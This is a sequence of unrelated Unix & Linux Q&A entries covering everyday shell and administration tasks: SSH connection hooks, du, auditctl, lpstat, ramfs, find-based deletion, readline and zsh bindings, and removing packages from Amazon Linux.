lstat("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", <unfinished ...> [pid 26667] 22:28:39.391848 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", R_OK <unfinished ...> [pid 26667] 22:28:39.391955 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", W_OK <unfinished ...> [pid 26667] 22:28:39.392059 access("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", X_OK <unfinished ...> [pid 26667] 22:28:39.392734 lgetxattr("/home/saml/samsung_ml2165w_print_drivers/ULD_Linux_V1.00.06 (copy).tar.gz", "security.selinux" <unfinished ...> The system calls, lstat, access, open, read, etc. are the lower level calls that would be in common.
Are nautilus and command-line commands the same?
1,515,164,174,000
I am trying to find a way to execute a specific command when connecting to a server via SSH. By this I mean, the command will execute unconditionally on opening a connection, so this would preferably be run at the same time that a Banner option would be printed if set. I am not trying to run a command after logging in. What I'm after, for example: $ ssh [email protected] (Command essentially executed at this point, before the input prints.) [email protected]'s password: The reason I'm trying to do this is that I would like to run a short script which sends push notifications to my phone whenever a connection is made, regardless of whether I login or not. I had planned to use pam_exec, but this only triggers auth if a password is entered and enter is pressed, and the account and session_* modules only trigger on a successful login. If a connection is opened, but then closed such as when a user simply hits Ctrl+C, then the script will never be run. Is there any method for doing this? I'm not finding much information on the subject.
You can run sshd via inetd, with inetd running: sh -c 'your-command; exec sshd -iD' upon an incoming connection (see the caveat in sshd(8) though).
Executing a remote command on SSH connection, before login
1,515,164,174,000
I have an directory structure like this: application1 application1_edit application2 application2_edit Is there any way to get the total size for every folder (including sub-directories) and exclude all folders with _edit in name? I have tried du -s on the root folder, but it lists all sub-directories.
Something like this should do it. $ du -s application[12] Example $ ls -l total 16 drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application1 drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application1_edit drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application2 drwxrwxr-x 2 saml saml 4096 Nov 28 01:51 application2_edit Disk usage: $ du -s application[12] 4 application1 4 application2
Getting size of directories and exclude some folders
1,373,893,866,000
I'm looking for a way to get the PID of a short child process in Linux. The process is instant from a human perspective. I know the parent process which will spawn the child process. Is there a way to log information about all the processes that are created by a specific parent process? I'm not looking for a way to retroactively figure out the PID of the child but a way to log it once it happens.
You could use the audit system: sudo auditctl -a exit,always -S execve -F ppid="$pid" would cause audit entries to be generated each time a child of $pid executes a command. audit.log would have things like: type=SYSCALL msg=audit(1373986729.977:377): arch=c000003e syscall=59 success=yes exit=0 a0=7ff000e4b188 a1=7ff000e4b1b0 a2=7fff928d47e8 a3=7fff928caac0 items=2 ppid=7502 pid=691 auid=10031 uid=10031 gid=10031 euid=10031 suid=10031 fsuid=10031 egid=10031 sgid=10031 fsgid=10031 ses=1 tty=pts5 comm="echo" exe="/bin/echo" key=(null) type=EXECVE msg=audit(1373986729.977:377): argc=2 a0="/bin/echo" a1="test" type=CWD msg=audit(1373986729.977:377): cwd="/tmp" type=PATH msg=audit(1373986729.977:377): item=0 name="/bin/echo" inode=131750 dev=fe:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 Where you can find the pid amongst other things. If you're interested in processes that don't necessarily execute something, you can add audit rules for the fork and clone system calls.
How to get the id of a very short child process if the parent is known?
1,373,893,866,000
I'm living in China, and lots of web service is not available or stable here like Github/Bitbucket/Imgur, When I'm using wget, git or some other commandline tools, I need using a proxy. Is there any tool to globally wrap socket connection in one terminal, so I don't need to memorize all the separate method for each commandline tools? I know there is some tools which can wrap std socket library.
I found one, it is proxychain: https://github.com/haad/proxychains
Commandline global proxy program?
1,373,893,866,000
I'm running Fedora 17, Gnome (3?), and using bash from terminal. Whenever I run lpstat I only get a list of my jobs, but every time I go to retrieve my jobs from the printer, somebody else is printing and mine hasn't even started! What gives? I want to view a list of all users' jobs, not just mine. I tried lpq to no avail. I've also tried lpstat -t and same result -- just my jobs, not anyone else's. What am I doing wrong here?
lpstat -u all (as root) should show all users and all jobs that are currently queued: -u <logon-IDs> Prints the status of output requests for users, in which can be one or all of the following: <user> - A user on the local system, as in lpstat -u user <host!user> - A user on a system, as in lpstat -u systema!user <host!all> - All users on a particular system, as in lpstat- u systema!all <all!user> - A particular user on all systems, as in lpstat -u all!user all - All users on all systems specified, as in lpstat -u all
View all user's printing jobs from the command line
1,373,893,866,000
In the grub.conf configuration file I can specify command line parameters that the kernel will use, i.e.: kernel /boot/kernel-3-2-1-gentoo root=/dev/sda1 vga=791 plasticDuck After booting up a given kernel, is there a way to tell if all parameters were passed 'correctly'? I.e. there is no plasticDuck kernel parameter, but: dmesg | grep plasticDuck only returns: Kernel command line: root=/dev/sda1 vga=791 plasticDuck (no error)
I don't think there's a command that lists built-in modules parameters and their values. If you know the path to the driver files you could list the parameters for that module e.g. if you used ipv6.autoconf=0 as a kernel boot parameter you could run: ls -1 /sys/module/ipv6/parameters/ autoconf disable disable_ipv6 and then, if the specified parameter is in the list (i.e. it is valid), check its value: cat /sys/module/ipv6/parameters/autoconf 0 Or, in your particular case - atkbd: cat /sys/bus/serio/drivers/atkbd/serio0/softraw 1 As per gilles post, for loadable modules you could use modinfo to list specific parameters and possible values but that doesn't work for built-in modules (although there have been attempts to add support for built-in modules): modinfo ipv6 modinfo: ERROR: Module ipv6 not found.
How to tell of whether the kernel parameter [passed at command line] is a valid kernel parameter?
1,373,893,866,000
updated: I'd like to save a large amount data ( ~ 100MB ) from the standard input in temporary location for the duration of my bash session. Piping it to a file won't work as I have only 30MB of free space. I also don't want to save it in a variable. I'd obviously have to utilize some space other than that of my Disk Storage. Which leaves my RAM. Is there some mechanism that will allow me to write to it, and then to retreive the written data again. ( like when you pipe to and from /dev/null )
you can mount an ramfs and store data there (as a file) # mkdir /media/ram # mount -t ramfs none /media/ram # <texfile grep pattern > /media/ram/ram # cat /media/ram/ram # umount /media/ram
How to save temp data
1,373,893,866,000
I've tried using answers given on here, and it doesn't seem to be working. Below are the commands I tried to remove all files with the index.php prefix in this directory on my CentOS system. The first two seem to have run but didn't do anything? $ find . -prune -name 'index.php.*' -exec rm {} + $ find . -prune -name 'index*' -exec rm {} + $ rm index.php* -bash: /usr/bin/rm: Argument list too long
Lets assume we have this test data set of test files: $ tree . ├── index.php ├── index.php.bar ├── index.php.foo ├── keppme.php └── level1 ├── index.php ├── index.php.l1 ├── keepme.php └── level2 ├── index.php ├── index.php.foo └── keepme.php Delete all files starting with index.php: $ find . -type f -name 'index.php*' -delete Then test files looks like: $ tree . ├── keppme.php └── level1 ├── keepme.php └── level2 └── keepme.php Delete those with something added after .php extension (like lindex.php.foo) but keep index.php: $ find . -type f -name 'index.php.*' -delete Then test data shows: $ tree . ├── index.php ├── keppme.php └── level1 ├── index.php ├── keepme.php └── level2 ├── index.php └── keepme.php Instead using -delete option you can also choose xargs to delete files in parallel. Sometimes for big file collection to delete this can speedup whole process but not always. Run rm command on every core/cpu with max 100 files per rm invocation: $ find . -type f -name 'index.php.*' -print0 | xargs -r0 -P $(nproc) -n 100 rm
Removing multiple files with same prefix (argument list too long)
1,373,893,866,000
return runs command and clears the command line. Is it possible to skip the clear part? So the command is executed but command line and cursor position is preserved so you can keep editing it. Alternative is to recall the command from history, but it is more keystrokes and looses cursor position
You could use the builtin bind to get the current line buffer and evaluate it on a given shortcut, for example to bind on ctrl + j: bind -x '"\C-j": eval "$READLINE_LINE"' Just tested superficially, use it at your own risk ;) The readline function operate-and-get-next is close to what you want but not exactly that.
Run command and keep editing it in Bash
1,373,893,866,000
In emacs, there is this shortcut M-\ Delete spaces and tabs around point (delete-horizontal-space). https://www.gnu.org/software/emacs/manual/html_node/emacs/Deletion.html it also works in bash. I wonder if there is an equivalent in zsh, or how to define one, please?
I don't think there is, but you can always write it yourself as: delete-horizontal-space() { emulate -L zsh set -o extendedglob LBUFFER=${LBUFFER%%[[:blank:]]##} RBUFFER=${RBUFFER##[[:blank:]]##} } zle -N delete-horizontal-space bindkey '\e\\' delete-horizontal-space
is there a shortcut to delete spaces and tabs around a point in zsh
1,373,893,866,000
I recently switched from bash to zsh. One (annoying) difference is that when I do Esc-K (in vi editing mode) to move back in command-line history, the cursor is placed at the end of the line initially. I want it to be at the beginning of the line initially. How can I get what I want?
For some reason, the default mappings for j and k in the vicmd key map are: "j" down-line-or-history "k" up-line-or-history Remapping them as follows should make them work the way you want: bindkey -a j vi-down-line-or-history bindkey -a k vi-up-line-or-history
zsh: history with cursor at beginning of line
1,373,893,866,000
I use EC2 on Amazon Web Services. The OS of the t2.micro instance is a customized “Amazon Linux” with 1 GiB RAM and 1 vCPU. When accessing this instance via their Cloud9 IDE I find that by default already 73% of the available file space (7.8G on /dev/xvda1) is occupied, and I can only use the remaining 2.2G. My requirements: I need to execute a Python script and write output data locally. I can do without GUI since I am working on the command line. What components of their OS can be safely removed in order to free up some space?
1. remove dispensable packages Amazon Linux instances manage their software using the yum package manager. The yum package manager can install, remove, and update software, as well as manage all of the dependencies for each package. – Managing Software on Your Linux Instance I have executed the following to produce a list of the 20 largest packages in the system: rpm -qa --queryformat '%10{size} - %-25{name} \t %{version}\n' | sort -nr | head -n 20 To remove packages with all of its dependencies I have then installed the yum plugin remove-with-leaves and then repeatedly removed the largest packages (including dependencies) which I deemed dispensable (see below for list): sudo yum remove package_name --remove-leaves 2. remove obsolete kernel Identified current kernel:uname -mrs Listed all kernels: rpm -q kernel Manually removed obsolete Linux kernel: sudo yum remove kernel-4.9.76-3.78.amzn1.x86_64 3. remove unused packages Identified packages that can be removed without affecting anything else (in debian-speak these are called “orphaned packages”) and removed quietly. sudo package-cleanup --quiet --leaves | sudo xargs -l1 yum -y remove Findings While I am actively only using Python 3.6.5 it is not possible to remove the default python (Python 2.7.14). Python is required by many of the Linux distributions. Many system utilities the distro providers combine (both GUI based and not), are programmed in Python. The version of python the system utilities are programmed in I will call the "main" python. [...] Because of the system utilities that are written in python it is impossible to remove the main python without breaking the system. – How to yum remove Python gracefully? Space occupied by python27 packages amounts to 115819035 bytes (~116 MB). Results A total of ~0.5 GB was reclaimed (7% of disk space on /dev/xvda1). 214 packages with a total of 633427867 bytes were removed: java-1.7.0-openjdk emacs-common mysql55-server java-1.7.0-openjdk-devel git mysql55 vim-common perl compat-libicu4 aws-apitools-ec2 emacs v8 ruby20-libs perl-Encode nodejs-devel aws-apitools-elb aws-apitools-as nodejs aws-apitools-mon perl-DBD-SQLite dejavu-sans-fonts subversion subversion-libs subversion-perl python36-devel dejavu-serif-fonts vim-enhanced libtool autoconf perl-DBI rubygem20-rdoc automake libX11-common perl-libs gyp cvs libX11 git-svn alsa-lib gnutls dejavu-sans-mono-fonts perl-Net-SSLeay npm libyaml-devel xorg-x11-fonts-Type1 perl-IO-Compress rsync libxcb libpng perl-Test-Harness rubygems20 perl-Pod-Simple fontconfig aws-amitools-ec2 lcms2 perl-DBD-MySQL55 git-cvs xorg-x11-font-utils libXfont perl-podlators perl-IO-Socket-SSL git-p4 v8-devel perl-YAML perl-Storable rubygem20-json perl-Git-SVN perl-PathTools nodejs-hawk perl-Pod-Perldoc ruby20-irb perl-File-Temp libuv-devel libserf system-rpm-config autogen-libopts perl-Getopt-Long perl-Compress-Raw-Zlib perl-Filter perl-GSSAPI dejavu-fonts-common libuv perl-Net-Daemon libICE cvsps perl-Socket rubygem20-psych perl-Digest-SHA git-email perl-Authen-SASL ttmkfdir perl-HTTP-Tiny perl-Data-Dumper nodejs-ctype perl-threads emacs-git perl-Time-HiRes perl-IO-Socket-IP libXext giflib rubygem20-bigdecimal libSM nodejs-async perl-threads-shared perl-PlRPC nodejs-hoek node-gyp libXi perl-Git nodejs-request nodejs-fstream perl-Scalar-List-Utils ruby20 nodejs-mime perl-Exporter perl-TermReadKey perl-Compress-Raw-Bzip2 nodejs-tar perl-Digest-MD5 perl-File-Path perl-Error http-parser perl-Net-LibIDN perl-Pod-Usage perl-Time-Local libfontenc libXrender libXau nodejs-npm-registry-client nodejs-minimatch nodejs-boom nodejs-http-signature nodejs-semver libXcomposite nodejs-glob nodejs-nopt perl-Digest perl-Carp libXtst perl-Thread-Queue nodejs-npmconf libffi-devel perl-constant gpm-libs perl-Pod-Escapes nodejs-normalize-package-data nodejs-packaging nodejs-read-package-json nodejs-promzard nodejs-lockfile nodejs-asn1 nodejs-ansi perl-Text-ParseWords copy-jdk-configs nodejs-form-data nodejs-sntp nodejs-fstream-npm nodejs-node-uuid nodejs-config-chain perl-Digest-HMAC nodejs-retry nodejs-graceful-fs nodejs-sigmund nodejs-npmlog http-parser-devel nodejs-read-installed nodejs-lru-cache nodejs-init-package-json nodejs-qs nodejs-slide nodejs-combined-stream nodejs-assert-plus nodejs-fstream-ignore nodejs-block-stream perl-parent nodejs-delayed-stream nodejs-ini nodejs-sha nodejs-cmd-shim nodejs-tunnel-agent nodejs-mute-stream nodejs-rimraf nodejs-read nodejs-osenv nodejs-mkdirp perl-macros nodejs-which nodejs-abbrev perl-Net-SMTP-SSL nodejs-archy nodejs-uid-number nodejs-aws-sign nodejs-forever-agent nodejs-opener nodejs-json-stringify-safe nodejs-proto-list nodejs-cryptiles nodejs-editor nodejs-child-process-close nodejs-github-url-from-git nodejs-cookie-jar nodejs-npm-user-validate nodejs-chmodr nodejs-chownr nodejs-once nodejs-inherits nodejs-oauth-sign aws-apitools-common mysql-config vim-filesystem ruby git-all fontpackages-filesystem Resources Amazon Linux AMI Amazon Linux AMI 2018.03 Release Notes GAD3R's answer to how to remove all installed dependent packages while removing a package in centos 7? How to remove old unused kernels on CentOS Linux jtoscarson's answer to Remove unused packages Owen Fraser-Green's answer to How can I remove Orphan Packages in Fedora?
How to trim down Amazon Linux OS for more free space?
1,373,893,866,000
I have to find the symbolic link which contains the longest folder name in a folder full of symbolic links. So far I have this: find <folder> -type l -printf "%l\n" I was wondering if there's any way to save the folder names while searching, something like this pseudo code: if [length > max] { max = length var = link } Thanks :)
find /path/to/base -type l | awk -F/ 'BEGIN {maxlength = 0; longest = "" } length( $NF ) > maxlength { maxlength = length( $NF ); longest = $NF } END { print "longest was", longest, "at", maxlength, "characters." }' To make the awk more readable: BEGIN { maxlength = 0 longest = "" } length( $NF ) > maxlength { maxlength = length( $NF ) longest = $NF } END { print "longest was", longest, "at", maxlength, "characters." } awk is great at dealing with delimited data. Since paths are delimited by /s, we use that as the field separator (with the -F switch), track the longest name we've seen with a longest variable, and its length in the maxlength variable. Some care and feeding to make the output sane if no links are found I shall leave as an exercise for the reader.
Find the longest file name
1,373,893,866,000
Basically, I want to open the current folder I'm in from terminal. I do gnome-open . from terminal and this opens the current folder I'm in. In my .bashrc, I have a simple function called open that does this for me. function open() { gnome-open . } So I just call open, and it works. The only issue is that I get a bunch of warning messages when I do this? (nautilus:414): GLib-GIO-CRITICAL **: g_dbus_interface_skeleton_unexport: assertion 'interface_->priv->connections != NULL' failed (nautilus:414): GLib-GIO-CRITICAL **: g_dbus_interface_skeleton_unexport: assertion 'interface_->priv->connections != NULL' failed (nautilus:414): Gtk-CRITICAL **: gtk_icon_theme_get_for_screen: assertion 'GDK_IS_SCREEN (screen)' failed (nautilus:414): GLib-GObject-WARNING **: invalid (NULL) pointer instance (nautilus:414): GLib-GObject-CRITICAL **: g_signal_connect_object: assertion 'G_TYPE_CHECK_INSTANCE (instance)' failed I don't really care about the warning messages, I just don't want to see them in the terminal. How can I hide warning messages that come from calling open? function open() { gnome-open . [ignore all warnings, just do what your asked] }
In case anyone wanted to know, I simply changed my function to redirect the error stuff. Now it becomes function open() { gnome-open . &>/dev/null }
How do I hide warning messages that come from a specific command?
1,373,893,866,000
I have a lot of files that start with numbers and are then hyphenated with descriptions. For example: 001 - awesomesauce 216 - stillawesomesauce They are organized by subdirectory So, how would I using bash script or some built-in look inside those directories to see if I am missing a number in order? I.e. report back that I am missing 002, 128, etc. in the above example. I know I can ls {000..216}\ -* and it will list the files and throw an error if it doesn't find it, but is there a better way to get JUST the missing files and do it recursively?
On a gnu setup you could run: myarr=( $(find . -type f -name '[0-9][0-9][0-9]*' -printf '%f\n' | cut -c1-3 | sort -n) ) join -v1 <(seq -w ${myarr[-1]}) <(printf '%s\n' ${myarr[@]}) Alternatively, with zsh, you could try something like this: myarr=( **/[0-9][0-9][0-9]*(.one_'REPLY=${${REPLY:t}:0:3}'_) ) mynums=( {001..$myarr[-1]} ) print -l ${mynums:|myarr} It extracts the numbers (the first three digits) from each file name, sorts them and saves the result in an array - myarr. It then sets another array - mynums containing numbers from 001 up to the value of the last index (i.e. the highest number extracted from the file names) and then uses parameter expansion to remove the values in myarr from the expansion of mynums.
List missing file names in a pattern
1,373,893,866,000
Simplified down, I want to write a shell function which runs a program in a new window. For applications like … emacs, firefox, gitk that can look like this: myopen() { $@ } But I want to open applications which run in the terminal in a new terminal, e.g. for alsamixer, vim, bash, zsh it should look like myopen() { urxvt -e "$@" } I have seen that .desktop files contain the information if they should run in a terminal (for vim / gvim) [Desktop Entry] Name=Vim GenericName=Text Editor TryExec=vim Exec=vim %F Terminal=true or [Desktop Entry] Name=GVim GenericName=Text Editor TryExec=gvim Exec=gvim -f %F Terminal=false is there an existing interface to query the Terminal filed (i.e. without using locate and grep to find the .desktop file and parsing them)? So in quasi code I want to fill the gap in myopen() { TERMINALFIELD=$(xdg-app-uses-terminal $1) # this line is made up if [[ TERMINALFIELD == true ]]; then urxvt -e "$@" else $@ fi return $? }
It looks like gtk-launch will do what you want. It will launch an application using the information in the .desktop file. Here is some relevant information from the man page: gtk-launch takes at least one argument, the name of the application to launch. The name should match application desktop file name, as residing in /usr/share/application, with or without the '.desktop' suffix.
determine (in script) if command runs in terminal (from desktop file?)
1,373,893,866,000
Recently, I was backing up a directory tree using cp -r, when I ran out of space in the receiving drive. I had to carry on with the backup, but to a different destination. Normally, to resume a cp command, you would ask cp to only copy the file if it isn't in the destination. You can see the problem here. Here was my solution: Screw up. # cp -rv sourcedir destdir error: no space left on device. Make a list of all files that had been copied successfully. # cd destdir # find . >/tmp/alreadycopied Write a script that could take any list A and a blacklist B and return a new list C = B \ A, containing every element in A that is not in B. I called it setminus. ***generate list A*** | setminus listB returns C to stdout. Use find and setminus to copy all remaining files to the new destination. # cd sourcedir # find . -type f | setminus /tmp/alreadycopied | xargs -d '\n' -I file cp -v --parents file overflowdestdir It worked, but I figure this set minus of lists is a common enough problem that the standard UNIX tools must somehow cover this use case, making my script unnecessary. Have any of you run into this problem, and if so, how did you solve it? The setminus script: #!/usr/bin/env python3 # ***generate list*** | setminus blacklist # Performs a set minus on its inputs and returns the result. Specifically, # filters a newline-separated list in stdin using blacklist---also a # newline-separated list. If an element of stdin is found in blacklist, it is # excluded from the output. Otherwise, the element is returned to stdout. Very # useful in conjunction with find commands. from sys import * try: blacklistfile = argv[1] except IndexError: stderr.write('usage: ***generate list*** | setminus blacklist.\n') exit(1) # A dict is used instead of a list to speed up searching. This blacklist could potentially be very large! blacklist = {} for line in open(blacklistfile): blacklist[line] = True for line in stdin: inblacklist = False try: inblacklist = blacklist[line] except KeyError: pass if not inblacklist: stdout.write(line)
If your lists are sorted you could use comm -23 to get the unique elements of the first list. If they are not, you could use grep like find -type f | grep -vFxf /tmp/alreadyCopied -v will find all the lines without a match -F tells it to use the strings as fixed strings, not as patterns -x matches the whole line instead of the string anywhere in the line -f /tmp/alreadyCopied read the lines to match from the given file You'll have to make sure the paths match though, so if find is producing ./dir1/file1 that needs to be the same string in /tmp/alreadyCopied Do note though, that this general approach will have problems if, say, you have a filename with \n in it. You could probably redo the whole thing within find with something like find . -type f -exec test ! -f destdir/{} \; -exec cp -v --parents {} overflowdestdir \;
Set minus of two newline-terminated lists / generic blacklisting using common household items